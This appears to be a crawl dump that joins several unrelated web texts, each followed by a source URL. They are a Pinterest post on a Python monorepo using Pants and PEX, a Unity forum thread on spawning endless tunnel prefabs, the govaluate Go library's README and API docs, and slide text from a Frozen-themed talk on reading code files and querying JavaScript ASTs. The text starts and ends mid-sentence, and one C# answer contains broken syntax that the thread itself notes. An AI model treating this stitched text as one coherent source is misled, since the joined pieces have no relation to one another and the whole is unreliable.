goal as we designed our new solution — we wanted it to be easy to do the right thing while enabling developers to quickly ship code. So we built a monorepo called Python Commons using Pants build tool. To streamline our release process, we use a Python EXecutable(PEX) file as our release primitive. Python commons monorepo The first decision was to start using a monorepo for all our tool’s code. This provides a single place for all code and allows us to enforce healthy development practices over a multi-repo solution. A consistent development, build and test environment also encourages modular code and code reuse. A monorepo is a more natural workflow for us since we have several language-specific monorepos, and it’s common for several tools share the same repo. Since we already have a Python monorepo for our frontend application code, our first instinct was to move the tool’s code into that repo to create a single repo for all Python code. However, that didn’t work, because the development workflow was heavily customized for building our monolithic Python web frontend. So, we decided to build a separate monorepo called “Python commons” for our tools and services. Pants While deciding on the monorepo was easy, the hard part was setting up a development workflow suitable for a wide-range of Python applications, from web apps to services, libraries and command line tools. To make managing and using the monorepo easier, we use Pants as our build tool. Pants helps enforce a uniform development workflow for building, testing and packaging apps while keeping our configuration DRY. The code layout we used in the repo provides a consistent development workflow for every project in the repo. - The folder structure shown in Figure 1 ensures source and tests are separated, and all internal code is in the Pinterest namespace. This separation safeguards us from shipping tests or their dependencies into production. - Pants comes with a built-in Python linter that enforces code style for the repo. - Standard build targets provide an intuitive and consistent development workflow to build, test, run and release packages (as shown in Figure 4). - The pants repl option provides an interactive repl to play with the code. - Pants creates a virtualenv for every run based on the dependencies in the BUILD file. If the dependencies change between Git branches, developers don’t have to switch virtualenvs to make sure their code works correctly making virtual env management seamless. - Since tests are run in a virtualenv, developers don’t have to learn or use tox. - Pants test target automatically creates a test runner, so there’s no need for a separate script to run tests. Pants simplifies dependency management across projects using repo and version pinning. - Pants controls which external repos we download our packages from. When our access to PyPi repo was blocked, we pointed the repo to an internal mirror with a one line configuration change to the pants.ini file. - We use the same set of pinned dependencies for the entire repo (as shown in Figure 2). This is the only place in the repo for defining our external dependencies and simplifies our dependency management. Pants builds a virtual environment for every build, so any dependency conflicts are detected right away. - A single place for pinned dependencies allows us to upgrade the package for all the projects in the repo at once. This greatly simplifies doing security audits and package version upgrades. By enabling fast reproducible builds, Pants simplifies build and release management. - Pants run target in a BUILD file can be used for running the program locally, eliminating the need for scripts. - Pants provides fast, reproducible builds for our packages. Pants performs incremental builds on its targets, so only changed modules are rebuilt which speeds up the build process. Running all the build targets in a virtual envs ensures builds are reproducible. - Pants python_library target can include a setup.py definition (as shown in Figure 3). By using this target, developers don’t have to learn setup.py to publish Python eggs. - Pants binary target generates a standalone pex binary for the project. PEX A monorepo with pants streamlined our development and test process. We observed our developers preferred their own repos, because it offers them control over the distribution of their code as a Debian package, Docker container, Python egg or script. To cater to these use cases and streamline our package release and deployment process, we needed a mechanism to easily export packages into various formats. Exporting an egg was easy since Pants natively supports it. To package our code into other formats, we used PEX as a basic packaging primitive for our code. A PEX is a self-contained, cross-platform, Python executable format with packaged dependencies, so it only needs a Python interpreter on the machine it’s running on. A PEX can be packaged into a Debian package, Docker container or uploaded to S3. The last deployment option is great for shipping internal tools, which are hardest to deploy and manage. Our multi-format package release process is powered by a Jenkins script (as shown in Figure 5). It uses the project name and release type to generate the necessary files (Dockerfile, Debian package, Python egg, PEX binary) and makes the build available for deploy by uploading them to their respective repos. The release process not only relieves our developers of understanding Docker, Debian package management or Python egg format, but it also enforces best hygienic and secure package management practices. Conclusion Using this development setup we take care of all the boilerplate code a developer writes before working on a project. This helps our developers focus on code without having to worry about setup.py, tox, virtualenv. It also eliminates the need to create scripts to setup and run the project locally, scripts to release a Docker or Debian packages or scripts to test code locally or in Jenkins. We rolled out Python commons almost a year ago and have already migrated 35 projects to it. Acknowledgements: We’d like to thank Evan Jones, Yongwen Xu and Nick Zheng for their help and feedback on the project. We’d also like to thank the pants community for their support.
https://medium.com/pinterest-engineering/building-a-python-monorepo-for-fast-reliable-development-be763781f67?source=rss-ef81ef829bcb------2
CC-MAIN-2022-05
en
refinedweb
Hi again! Right now I'm trying to make an endless tunnel. I have say about 5 prefabs stuck together to make a tunnel at the beginning of the level, for a start. When you get close to the end of this pre-done set of tunnels, I want it to create say 5 or 10 more after those. (They're on the Z axis) I've been messing around with the various Instantiate functions, and I know that's what I need to do but it's just not working the way I want it to. I was using the first Instantiate script from Unity's Instantiate scripting page and it's almost exactly what I want. It creates them and I can specify how many, and how spaced apart they are on what axis. Got all that working, set up a timer to make it only instantiate 10 every 10 seconds, but the problem is, it's creating the same 10 over each other every time. It doesn't know that I want them created further along the Z axis, from the last batch. Is there an easy way to do this? Still not a whiz at scripting so any help would be appreciated. Thanks! :) EDIT: My current script: var prefab : Transform; private var CreateTimer = 10.0; private var NextCreate = 0.0; function Update() { if(Time.time > CreateTimer + NextCreate) { NextCreate = Time.time; for (var i : int = 0;i < 10; i++) { Instantiate (prefab, Vector3(0, 0, i * 47.87), Quaternion.identity); } } } Answer by ByteSheep · Apr 21, 2012 at 10:34 PM If I understand correctly, then this should do the trick: var prefab : Transform; private var CreateTimer = 10.0; private var NextCreate = 0.0; private var count = 0; function Update() { if(Time.time > CreateTimer + NextCreate) { NextCreate = Time.time; for (var i : int = 0;i < 10; i++) { count++; Instantiate (prefab, Vector3(0, 0, count * 47.87), Quaternion.identity); } } } Basically you need a variable that won't be reset each time the ten pieces have been created.. Hope this helps ;) EDIT: Here's a slightly cleaner version using coroutines (untested). var prefab : GameObject; var segmentPrefabCount = 10; var pieceLength = 20.0f; var startPositionOffset = Vector3(0, 0, 0); private var pieceNumber = 0; function Start() { // Create a new segment every 10 seconds InvokeRepeating ("CreateSegment", 10f, 10f); } function CreateSegment() { // Create a segment with segmentPrefabCount amount of prefabs for (var i = 0; i < segmentPrefabCount; i++) { CreatePiece(); } } function CreatePiece() { // Position for this piece will be the startPositionOffset plus the length of a prefab times it's index // Change Vector3.forward to whichever direction you need (e.g. -Vector3.up) var segmentPosition = startPositionOffset + Vector3.forward * (pieceNumber * pieceLength); Instantiate (prefab, segmentPosition, Quaternion.identity); pieceNumber++; } That works perfectly! I knew it was simple, thank you so much. :) Glad to see you got it working. Hello, I'm really new at scripting and to Unity itself. Doing some research to work on a game similar to this tunnel effect that looks like as if a character is falling through a hole. I'd like to ask how does the NextCreate help with this situation because I'm stuck at understanding that part. And also why the value of 47.87? Hopefully someone turns up to answer because this is an old thread. :) Edited my answer with a script that uses coroutines ins$$anonymous$$d of Time. Also added a couple comments to hopefully make it more clear what each line is doing. Answer by Atrius · Apr 21, 2012 at 10:08 PM You need to instantiate the prefab as a GameObject and then translate its position to move it. Without seeing your existing script I can't help modify yours. Here's a C# script I just wrote up, there could be syntax issues I didn't actually compile this, but I hope it gives you an idea. public class TunnelGenerator : MonoBehavior { int segmentNumber = 0; float segmentLength = 15.0f; void CreateSegment() { // Increment what segment number you are on segmentNumber++; // Create a vector with your X,Y static and your Z the length of the prefab times the number of segments Vector3 pos = new Vector3(0.0f,0.0f,segmentLength * segmentNumber); // Instantiate it GameObject segment = (GameObject)Instantiate.(Resources.Load("TunnelPiece")); // Move it into place segment.transform.Translate(v, Space.World); } } Yeah, I'm not too good with C#. I learned Java/UnityScript. That script makes some sense, though. And it does have some errors but I get the gist of things. Still not exactly sure how I should input my own values into that, though. I edited my question with the current script I was using if you want to take a look at it. I'll figure it out eventually, so you don't have to stress yourself with this. :) Also, I worked things out and the one error I get from your script is this: Assets/Scripts/InstantiateC.cs(14,26): error CS1061: Type UnityEngine.Transform' does not contain a definition for translate' and no extension method translate' of type UnityEngine.Transform' could be found (are you missing a using directive or an assembly reference?) UnityEngine.Transform' does not contain a definition for translate' of type I would like to see how yours works ingame and I can probably convert it and tweak it. I believe the root cause of the issue is Translate is capitalized. I adapted this from memory off a system I had used but for mine I was storing a reference to each piece. Your code is much cleaner assuming you don't need the reference and just need it loaded in the. There is a generation lag 1 Answer Generate cubes in 5 areas 1 Answer How can I destroy many instantiated objects on endless game 1 Answer My randomly generated slope game doesn't seem to work? 0 Answers Platforms are been generated more and more to the left or right 0 Answers EnterpriseSocial Q&A
https://answers.unity.com/questions/243058/making-an-endless-tunnel.html?sort=oldest
CC-MAIN-2022-05
en
refinedweb
README ¶ govaluate Provides support for evaluating arbitrary C-like artithmetic/string expressions. Why can't you just write these expressions in code?. A lot of people wind up writing their own half-baked style of evaluation language that fits their needs, but isn't complete. Or they wind up baking the expression into the actual executable, even if they know it's subject to change. These strategies may work, but they take time to implement, time for users to learn, and induce technical debt as requirements change. This library is meant to cover all the normal C-like expressions, so that you don't have to reinvent one of the oldest wheels on a computer. How do I use it? You create a new EvaluableExpression, then call "Evaluate" on it. expression, err := govaluate.NewEvaluableExpression("10 > 0"); result, err := expression.Evaluate(nil); // result is now set to "true", the bool value. Cool, but how about with parameters? expression, err := govaluate.NewEvaluableExpression("foo > 0"); parameters := make(map[string]interface{}, 8) parameters["foo"] = -1; result, err := expression.Evaluate(parameters); // result is now set to "false", the bool value. That's cool, but we can almost certainly have done all that in code. What about a complex use case that involves some math? expression, err := govaluate.NewEvaluableExpression("(requests_made * requests_succeeded / 100) >= 90"); parameters := make(map[string]interface{}, 8) parameters["requests_made"] = 100; parameters["requests_succeeded"] = 80; result, err := expression.Evaluate(parameters); // result is now set to "false", the bool value. Or maybe you want to check the status of an alive check ("smoketest") page, which will be a string? expression, err := govaluate.NewEvaluableExpression("http_response_body == 'service is ok'"); parameters := make(map[string]interface{}, 8) parameters["http_response_body"] = "service is ok"; result, err := expression.Evaluate(parameters); // result is now set to "true", the bool value. These examples have all returned boolean values, but it's equally possible to return numeric ones. expression, err := govaluate.NewEvaluableExpression("(mem_used / total_mem) * 100"); parameters := make(map[string]interface{}, 8) parameters["total_mem"] = 1024; parameters["mem_used"] = 512; result, err := expression.Evaluate(parameters); // result is now set to "50.0", the float64 value. You can also do date parsing, though the formats are somewhat limited. Stick to RF3339, ISO8061, unix date, or ruby date formats. If you're having trouble getting a date string to parse, check the list of formats actually used: parsing.go:248. expression, err := govaluate.NewEvaluableExpression("'2014-01-02' > '2014-01-01 23:59:59'"); result, err := expression.Evaluate(nil); // result is now set to true Expressions are parsed once, and can be re-used multiple times. Parsing is the compute-intensive phase of the process, so if you intend to use the same expression with different parameters, just parse it once. Like so; expression, err := govaluate.NewEvaluableExpression("response_time <= 100"); parameters := make(map[string]interface{}, 8) for { parameters["response_time"] = pingSomething(); result, err := expression.Evaluate(parameters) } The normal C-standard order of operators is respected. When writing an expression, be sure that you either order the operators correctly, or use parenthesis to clarify which portions of an expression should be run first. Escaping characters Sometimes you'll have parameters that have spaces, slashes, pluses, ampersands or some other character that this library interprets as something special. For example, the following expression will not act as one might expect: "response-time < 100" As written, the library will parse it as "[response] minus [time] is less than 100". In reality, "response-time" is meant to be one variable that just happens to have a dash in it. There are two ways to work around this. First, you can escape the entire parameter name: "[response-time] < 100" Or you can use backslashes to escape only the minus sign. "response\\-time < 100" Backslashes can be used anywhere in an expression to escape the very next character. Square bracketed parameter names can be used instead of plain parameter names at any time. Functions You may have cases where you want to call a function on a parameter during execution of the expression. Perhaps you want to aggregate some set of data, but don't know the exact aggregation you want to use until you're writing the expression itself. Or maybe you have a mathematical operation you want to perform, for which there is no operator; like log or tan or sqrt. For cases like this, you can provide a map of functions to NewEvaluableExpressionWithFunctions, which will then be able to use them during execution. For instance; functions := map[string]govaluate.ExpressionFunction { "strlen": func(args ...interface{}) (interface{}, error) { length := len(args[0].(string)) return (float64)(length), nil }, } expString := "strlen('someReallyLongInputString') <= 16" expression, _ := govaluate.NewEvaluableExpressionWithFunctions(expString, functions) result, _ := expression.Evaluate(nil) // result is now "false", the boolean value Functions can accept any number of arguments, correctly handles nested functions, and arguments can be of any type (even if none of this library's operators support evaluation of that type). For instance, each of these usages of functions in an expression are valid (assuming that the appropriate functions and parameters are given): "sqrt(x1 ** y1, x2 ** y2)" "max(someValue, abs(anotherValue), 10 * lastValue)" Functions cannot be passed as parameters, they must be known at the time when the expression is parsed, and are unchangeable after parsing. What operators and types does this support? -: ?? See MANUAL.md for exacting details on what types each operator supports. Types Some operators don't make sense when used with some types. For instance, what does it mean to get the modulo of a string? What happens if you check to see if two numbers are logically AND'ed together? Everyone has a different intuition about the answers to these questions. To prevent confusion, this library will refuse to operate upon types for which there is not an unambiguous meaning for the operation. See MANUAL.md for details about what operators are valid for which types. Benchmarks If you're concerned about the overhead of this library, a good range of benchmarks are built into this repo. You can run them with go test -bench=.. The library is built with an eye towards being quick, but has not been aggressively profiled and optimized. For most applications, though, it is completely fine. For a very rough idea of performance, here are the results output from a benchmark run on a 3rd-gen Macbook Pro (Linux Mint 17.1). BenchmarkSingleParse-12 1000000 1382 ns/op BenchmarkSimpleParse-12 200000 10771 ns/op BenchmarkFullParse-12 30000 49383 ns/op BenchmarkEvaluationSingle-12 50000000 30.1 ns/op BenchmarkEvaluationNumericLiteral-12 10000000 119 ns/op BenchmarkEvaluationLiteralModifiers-12 10000000 236 ns/op BenchmarkEvaluationParameters-12 5000000 260 ns/op BenchmarkEvaluationParametersModifiers-12 3000000 547 ns/op BenchmarkComplexExpression-12 2000000 963 ns/op BenchmarkRegexExpression-12 100000 20357 ns/op BenchmarkConstantRegexExpression-12 1000000 1392 ns/op ok API Breaks While this library has very few cases which will ever result in an API break, it can (and has) happened. If you are using this in production, vendor the commit you've tested against, or use gopkg.in to redirect your import (e.g., import "gopkg.in/Knetic/govaluate.v2"). Master branch (while infrequent) may at some point contain API breaking changes, and the author will have no way to communicate these to downstreams, other than creating a new major release. Releases will explicitly state when an API break happens, and if they do not specify an API break it should be safe to upgrade. License This project is licensed under the MIT general use license. You're free to integrate, fork, and play with this code as you feel fit without consulting the author, as long as you provide proper credit to the author in your works. Documentation ¶ Index ¶ - Variables - type EvaluableExpression - func NewEvaluableExpression(expression string) (*EvaluableExpression, error) - func NewEvaluableExpressionFromTokens(tokens []ExpressionToken) (*EvaluableExpression, error) - func NewEvaluableExpressionWithFunctions(expression string, functions map[string]ExpressionFunction) (*EvaluableExpression, error) - func (this EvaluableExpression) Eval(parameters Parameters) (interface{}, error) - func (this EvaluableExpression) Evaluate(parameters map[string]interface{}) (interface{}, error) - func (this EvaluableExpression) String() string - func (this EvaluableExpression) ToSQLQuery() (string, error) - func (this EvaluableExpression) Tokens() []ExpressionToken - func (this EvaluableExpression) Vars() []string - type ExpressionFunction - type ExpressionToken - type MapParameters - - type OperatorSymbol - - type Parameters - type TokenKind - Constants ¶ This section is empty. Variables ¶ var DUMMY_PARAMETERS = MapParameters(map[string]interface{}{}) Functions ¶ This section is empty. Types ¶ type EvaluableExpression ¶ type EvaluableExpression struct { /* Represents the query format used to output dates. Typically only used when creating SQL or Mongo queries from an expression. Defaults to the complete ISO8601 format, including nanoseconds. */ QueryDateFormat string /* Whether or not to safely check types when evaluating. If true, this library will return error messages when invalid types are used. If false, the library will panic when operators encounter types they can't use. This is exclusively for users who need to squeeze every ounce of speed out of the library as they can, and you should only set this to false if you know exactly what you're doing. */ ChecksTypes bool // contains filtered or unexported fields } EvaluableExpression represents a set of ExpressionTokens which, taken together, are an expression that can be evaluated down into a single value. func NewEvaluableExpression ¶ func NewEvaluableExpression(expression string) (*EvaluableExpression, error) Parses a new EvaluableExpression from the given [expression] string. Returns an error if the given expression has invalid syntax. func NewEvaluableExpressionFromTokens ¶ func NewEvaluableExpressionFromTokens(tokens []ExpressionToken) (*EvaluableExpression, error) Similar to [NewEvaluableExpression], except that instead of a string, an already-tokenized expression is given. This is useful in cases where you may be generating an expression automatically, or using some other parser (e.g., to parse from a query language) func NewEvaluableExpressionWithFunctions ¶ func NewEvaluableExpressionWithFunctions(expression string, functions map[string]ExpressionFunction) (*EvaluableExpression, error) Similar to [NewEvaluableExpression], except enables the use of user-defined functions. Functions passed into this will be available to the expression. func (EvaluableExpression) Eval ¶ added in v1.5.0 func (this EvaluableExpression) Eval(parameters Parameters) (interface{}, error) Runs the entire expression using the given [parameters]. e.g., If the expression contains a reference to the variable "foo", it will be taken from `parameters.Get("foo")`. This function returns errors if the combination of expression and parameters cannot be run, such as if a variable in the expression is not present in [parameters]. In all non-error circumstances, this returns the single value result of the expression and parameters given. e.g., if the expression is "1 + 1", this will return 2.0. e.g., if the expression is "foo + 1" and parameters contains "foo" = 2, this will return 3.0 func (EvaluableExpression) Evaluate ¶ func (this EvaluableExpression) Evaluate(parameters map[string]interface{}) (interface{}, error) Same as `Eval`, but automatically wraps a map of parameters into a `govalute.Parameters` structure. func (EvaluableExpression) String ¶ func (this EvaluableExpression) String() string Returns the original expression used to create this EvaluableExpression. func (EvaluableExpression) ToSQLQuery ¶ added in v1.2.0 func (this EvaluableExpression) ToSQLQuery() (string, error) Returns a string representing this expression as if it were written in SQL. This function assumes that all parameters exist within the same table, and that the table essentially represents a serialized object of some sort (e.g., hibernate). If your data model is more normalized, you may need to consider iterating through each actual token given by `Tokens()` to create your query. Boolean values are considered to be "1" for true, "0" for false. Times are formatted according to this.QueryDateFormat. func (EvaluableExpression) Tokens ¶ func (this EvaluableExpression) Tokens() []ExpressionToken Returns an array representing the ExpressionTokens that make up this expression. func (EvaluableExpression) Vars ¶ func (this EvaluableExpression) Vars() []string Returns an array representing the variables contained in this EvaluableExpression. type ExpressionFunction ¶ Represents a function that can be called from within an expression. This method must return an error if, for any reason, it is unable to produce exactly one unambiguous result. An error returned will halt execution of the expression. type ExpressionToken ¶ Represents a single parsed token. type MapParameters ¶ added in v1.5.0 func (MapParameters) Get ¶ added in v1.5.0 func (p MapParameters) Get(name string) (interface{}, error) type OperatorSymbol ¶ Represents the valid symbols for operators. const ( VALUE OperatorSymbol = iota LITERAL NOOP EQ NEQ GT LT GTE LTE REQ NREQ IN AND OR PLUS MINUS BITWISE_AND BITWISE_OR BITWISE_XOR BITWISE_LSHIFT BITWISE_RSHIFT MULTIPLY DIVIDE MODULUS EXPONENT NEGATE INVERT BITWISE_NOT TERNARY_TRUE TERNARY_FALSE COALESCE FUNCTIONAL SEPARATE ) func (OperatorSymbol) IsModifierType ¶ added in v1.4.0 func (this OperatorSymbol) IsModifierType(candidate []OperatorSymbol) bool Returns true if this operator is contained by the given array of candidate symbols. False otherwise. func (OperatorSymbol) String ¶ func (this OperatorSymbol) String() string Generally used when formatting type check errors. We could store the stringified symbol somewhere else and not require a duplicated codeblock to translate OperatorSymbol to string, but that would require more memory, and another field somewhere. Adding operators is rare enough that we just stringify it here instead. type Parameters ¶ added in v1.5.0 type Parameters interface { /* Get gets the parameter of the given name, or an error if the parameter is unavailable. Failure to find the given parameter should be indicated by returning an error. */ Get(name string) (interface{}, error) } Parameters is a collection of named parameters that can be used by an EvaluableExpression to retrieve parameters when an expression tries to use them. type TokenKind ¶ Represents all valid types of tokens that a token can be.
https://pkg.go.dev/github.com/Knetic/govaluate
CC-MAIN-2022-05
en
refinedweb
Do You Want to Build a Build Tool? Do You Want to Build a Build Tool? Hi Everyone, I'm Craig ! Hi Everyone, I'm Craig ! - twitter/phenomnominal - github/phenomnomnominal @phenomnominal 2020 Today, I'm going to tell you a fairy tale! Today, I'm going to tell you a Fairy Tale! @phenomnominal 2020 Ready? Ready? @phenomnominal 2020 It was Summer in the Kingdom of Arendelle! It was Summer in the Kingdom of Arendelle! @phenomnominal 2020 And Princess Anna was So Excited! And Princess Anna was So Excited! @phenomnominal 2020 The day had finally arrived! The day had finally arrived! @phenomnominal 2020 Queen Elsa, Anna's sister and Best friend Queen Elsa, Anna's sister and Best friend @phenomnominal 2020 Had finally agreed to share her secrets! Had finally agreed to share her secrets! @phenomnominal 2020 Anna, and her friends Kristoff, Sven and Olaf Anna, and her friends Kristoff, Sven and Olaf @phenomnominal 2020 Had been working hard all winter Had been working hard all winter @phenomnominal 2020 And now it was time for their reward! And now it was time for their reward! @phenomnominal 2020 Elsa has Amazing powers! Elsa has Amazing powers! @phenomnominal 2020 She can sense the water molecules around us, She can sense the water molecules around us, @phenomnominal 2020 transform those water molecules into ice, transform those water molecules into ice, @phenomnominal 2020 And control that ice however she likes! And control that ice however she likes! @phenomnominal 2020 today, Elsa IS going to share her magic! today, Elsa is going to share her magic! @phenomnominal 2020 Chapter One Chapter One Just like magic Just like magic "Anna, do you remember when we went on our trip into the internet?", asked Elsa. @phenomnominal 2020 "Of course!", "We met all the other princesses, it was so much fun!" replied Anna. @phenomnominal 2020 "There was that cute, new little princess, Vanellope!" @phenomnominal 2020 "And her friend Ralph was in trouble!" @phenomnominal 2020 "And we helped save him!" @phenomnominal 2020 "That's right! It was such a fun trip!" "What else do you remember about the internet?" @phenomnominal 2020 "There was so much to do, so much to see!", "So much data flying around! l learned all about how to make websites!" exclaimed Anna. " l loved it so much l even taught Sven when l got back!" @phenomnominal 2020 *SLURP! * , Sven confirmed. @phenomnominal 2020 "l learned to write HTML, and CSS, and JavaScript! "lt was just like magic!" @phenomnominal 2020 It was just like magic @phenomnominal 2020 Chapter Two Chapter Two Sufficiently incredible Sufficiently incredible Anna, Kristoff, Olaf, and Sven waited patiently for Elsa to continue. @phenomnominal 2020 "I'm going to let you in on my little secret", Elsa began. @phenomnominal 2020 "You may have heard that any sufficiently advanced technology is indistinguishable from magic," "but actually, its the other way around..." @phenomnominal 2020 "Any sufficiently incredible magic, is usually actually technology!" @phenomnominal 2020 "Wow! That's amazing! I think?" Kristoff was already blown away by this. @phenomnominal 2020 "I'm just getting started!" "To begin, we need to talk about data..." said Elsa, with a grin. @phenomnominal 2020 "The whole internet is full of data." "Memes" "Infographics" @phenomnominal 2020 {" @phenomnominal 2020 > @phenomnominal 2020 " @phenomnominal 2020 "Olaf, what exactly do you imagine when you think about snow?" @phenomnominal 2020 "I think about skiing, and sledding, and snow fights!" "It's so bright, and so cold, and so hard, but also so soft!" "What do you think about Elsa?", he asked. @phenomnominal 2020 "I think about all those things too!" "But my powers allow me to see another level deeper as well..." "Going outside in the cold, having fun with our friends, ice skating..." @phenomnominal 2020 "I see the whole system." "In that system, each water molecule is a little bit of data, following the set of instructions that nature gave it." @phenomnominal 2020 "Those instructions tell the water molecules when to freeze. " "Those instructions tell the molecules which way to go when the wind blows." "I know how to control those instructions." @phenomnominal 2020 "l've worked it out!", "You can understand the snow's source code!" Anna announced suddenly. @phenomnominal 2020 "Exactly!", Esla grinned again. "And do you want to know the best bit?" @phenomnominal 2020 "The code that contains the instructions for all the snow in the world is written in JavaScript!" "I can show you how to query code, modify code, and even create code from nothing!!" "What do you think?" @phenomnominal 2020 Chapter Three Chapter THREE The Snow Code The Snow Code Olaf was so excited that he could barely stop himself from bursting into song! @phenomnominal 2020 "Will you teach us to use the snow code, Elsa?" "Please, please, please, please, PLEASE!" , he pleaded. @phenomnominal 2020 "Of course I will!" , Elsa reassured him. @phenomnominal 2020 "But first, I need to teach you a few tricks!" @phenomnominal 2020 "My gifts let me access the snow code directly!" "You will need to use a slightly more direct approach..." "Kristoff, have you heard of node.js?" @phenomnominal 2020 "Yes!" Kristoff looked pretty proud of himself. "Anna taught me all about it." @phenomnominal 2020 "Node.js is a computer program that lets us run JavaScript without a browser!" @phenomnominal 2020 "We can use it to do things like read and write files, find out stuff about the system, and manipulate data in lots of different ways!" @phenomnominal 2020 "Exactly right! Let's start by looking at how we can read and write files using node.js" @phenomnominal 2020 @phenomnominal 2020 File System APIs File System APIs The most important functions for us to learn today are: fs.writeFile fs.mkdir fs.readFile - - read a file from a path - - make a directory at a path - - write a file to a path @phenomnominal 2020 File System APIs File System APIs // snowflake.txt () /\ //\\ << >> () \\// () ()._____ /\ \\ /\ _____.() \.--.\ //\\ //\\ //\\ /.--./ \\__\\/__\//__\//__\\/__// '--/\\--//\--//\--/\\--' \\\\///\\//\\\//// ()-= >>\\< <\\> >\\<< =-() ////\\\//\\///\\\\ .--\\/--\//--/\\--/\\--. //""/\\""//\""//\""//\""\\ /'--'/ \\// \\// \\// \'--'\ ()`"""` \/ // \/ `"""`() () //\\ () << >> \\// \/ () Imagine that we have a file like this: @phenomnominal 2020: @phenomnominal 2020 File System APIs File System APIs Which will give us something like this: Weaseltown:dywbabt queenelsa$ node index.js () /\ //\\ << >> () \\// () ()._____ /\ \\ /\ _____.() \.--.\ //\\ //\\ //\\ /.--./ \\__\\/__\//__\//__\\/__// '--/\\--//\--//\--/\\--' \\\\///\\//\\\//// ()-= >>\\< <\\> >\\<< =-() ////\\\//\\///\\\\ .--\\/--\//--/\\--/\\--. //""/\\""//\""//\""//\""\\ /'--'/ \\// \\// \\// \'--'\ ()`"""` \/ // \/ `"""`() () //\\ () << >> \\// \/ () @phenomnominal 2020: @phenomnominal 2020 Path APIs Path APIs It is also important to understand how the path API works: path.resolve - - resolve a path relative to the given path - - split a path string into its constituent parts path.parse @phenomnominal 2020 () { const relativePath = path.resolve(__dirname, './snowflake.txt'); const relativePath = path.resolve(process.cwd(), './snowflake.txt'); return fs.readFile(relativePath, 'utf8'); } @phenomnominal 2020 , Sven snorted. *snort* @phenomnominal 2020 "That's right Sven! You must always test your file structure & path operations on all the different operating systems you care about! It's very easy to get it wrong!" @phenomnominal 2020 "Now, we've seen how we can read a plain text file, what about something a bit different..." @phenomnominal 2020 @phenomnominal 2020 "Wow! So we took some data that was in a file, and parsed it into JavaScript objects that we can manipulate with code!" Anna was really excited! @phenomnominal 2020 "If you think that is cool, check this out..." Elsa was just getting started! @phenomnominal 2020 "If you think that is cool, check this out..." const SNOW_CODE_PATH = path.resolve( __dirname, './elsa', process.env.SECRET_SNOW_FILE ); Elsa was just getting started! @phenomnominal 2020 "THE PATH TO THE SNOW CODE!" Olaf instantly knew what it was! const SNOW_CODE_PATH = path.resolve( __dirname, './elsa', process.env.SECRET_SNOW_FILE ); @phenomnominal 2020 "Yes! The snow code is just another file!" "It's just text and we can manipulate it and control it!" @phenomnominal 2020 import { promises as fs } from 'fs'; export async function readSnowCode () { return fs.readFile(SNOW_CODE_PATH, 'utf8'); } console.log(await readSnowCode()); Code as data Code as data We don't need to treat a code file any differently: @phenomnominal 2020 @phenomnominal 2020 "Now we have the snow code as a string, so we can change it however we want!" "This is amazing!" Kristoff chimed in: @phenomnominal 2020 //. @phenomnominal 2020 //_138<< , replied Olaf @phenomnominal 2020 //_140<< Even Sven had his own ideas... @phenomnominal 2020 "Hold on everyone, l think we're getting ahead of ourselves!" "Anna, can you think of any reasons why working with the string directly might not be the best approach?" @phenomnominal 2020 "Strings aren't exactly structured!" "You're just changing a bunch of characters, and that could break easily!" "Regular Expressions are hard to get right, and hard to understand later!" "You have to fight with comments, and whitespace!" @phenomnominal 2020 "So how can we get the snow code into a more useful structure?" @phenomnominal 2020: @phenomnominal 2020 import { parseScript } from 'esprima'; import { readSnowCode } from './read-snow-code'; const code = await readSnowCode(); const ast = parseScript(code); console.log(ast); Parsing Parsing We also need to parse our string of code! @phenomnominal 2020 "An ast, I LOVE IT!" "What is an ast?" @phenomnominal 2020 "Good try Olaf..." "It's actually an A S T " "It's an Abstract Syntax Tree..." @phenomnominal 2020 Chapter Four Chapter Four The root of all problems The root of all problems "Oh yeah of course, I know all about those kinds of trees..." "But I think Sven needs a bit of a refresher..." Kristoff sounded uncertain. @phenomnominal 2020 "Sure! Let's start with a literal meaning." @phenomnominal 2020 Abstract Syntax Trees Tree data structure made up of vertices and edges without any cycles SYNTAX the way in which linguistic elements are put together Abstract Not associated with any specific instance Abstract Syntax Trees @phenomnominal 2020 ???? ???? ???? ???? ???? ???? ???? ???? ???? @phenomnominal 2020 2020 { type: 'Program', body: [{ type: 'VariableDeclaration', declarations: [{ type: 'VariableDeclarator', id: { type: 'Identifier', name: 'it' }, init: { type: 'CallExpression', callee: { type: 'Identifier', name: 'go' }, arguments: [{ type: Literal', value: 'let it go' }] } }], kind: 'let' }] } @phenomnominal 2020 'let it go' Literal Identifier CallExpression Identifier VariableDeclarator VariableDeclaration go go('let it go') it it = go('let it go') let it = go('let it go'); @phenomnominal 2020 @phenomnominal 2020 "AST Explorer lets you look at the parser output for a huge number of languages!" "It is very useful for seeing the structure of the tree and what properties are present!" AST Explorer AST Explorer @phenomnominal 2020 @phenomnominal 2020 2020 "So Anna, what do you think? Is this better than the string version?" @phenomnominal 2020 "l think so!" "We have a real structure now with the AST" "We access data exactly like we would with JSON, so it's easier to understand" "We don't have to think about comments, or whitespace, we just access what we want to!" @phenomnominal 2020 "lt's still kind of clunky though..." "Do you think we can do better?", "And it will throw an error if the structure doesn't line up with the code!" Elsa asked. ..." @phenomnominal 2020 "Olaf, what do you think this data structure represents?" " }] } @phenomnominal 2020 "IT LOOKS LIKE HTML!" @phenomnominal 2020 "That's an approximation of what the browser creates when it downloads an HTML file and parses it!" "Very good!" "We call it the Document Object Model, or the DOM." "It is also a tree!" @phenomnominal 2020 "Now, wouldn't it be strange if we queried the DOM like this?" import { parse } from './parse-html'; const HTML = ` <h3>...</h3> ... `; const dom = parse(HTML); const node = dom.children[1].children[3].children[0]; console.log(node); @phenomnominal 2020 "It's much more likely that we would do something like this:" const dom = parse(HTML); const node = $(dom, 'body > h3 > span:last-child'); console.log(node); "CSS selectors are a very powerful way to navigate a tree!" @phenomnominal 2020 "So why don't we just use CSS selectors with the JavaScript AST?" "Does JavaScript let us do that?" @phenomnominal 2020 "Unfortunately no, not out of the box..." "Fortunately, there's a huge JavaScript open-source community, and some wonderful people made it so we can do this! @phenomnominal 2020 @phenomnominal 2020 @phenomnominal 2020 "Woooow" Olaf was impressed @phenomnominal 2020 "I get it! These tools are amazing!" "We can find out if a file has an identifier with a certain name!" "Or all the names of all the exported functions!" "Or if it matches some syntactical pattern!" @phenomnominal 2020 "Like a lint rule!?" "Yes! AST queries are *perfect* for writing lint rules!" @phenomnominal 2020 !`); } @phenomnominal 2020 "But wait. What do these queries have to do with the snow code?" @phenomnominal 2020 "In order to change how the snow code works, we need to be able to add our code in the right place!" "This is where the real magic begins..." @phenomnominal 2020 Chapter Five Chapter Five Real Magic Real Magic "My magic works by changing how physics works in 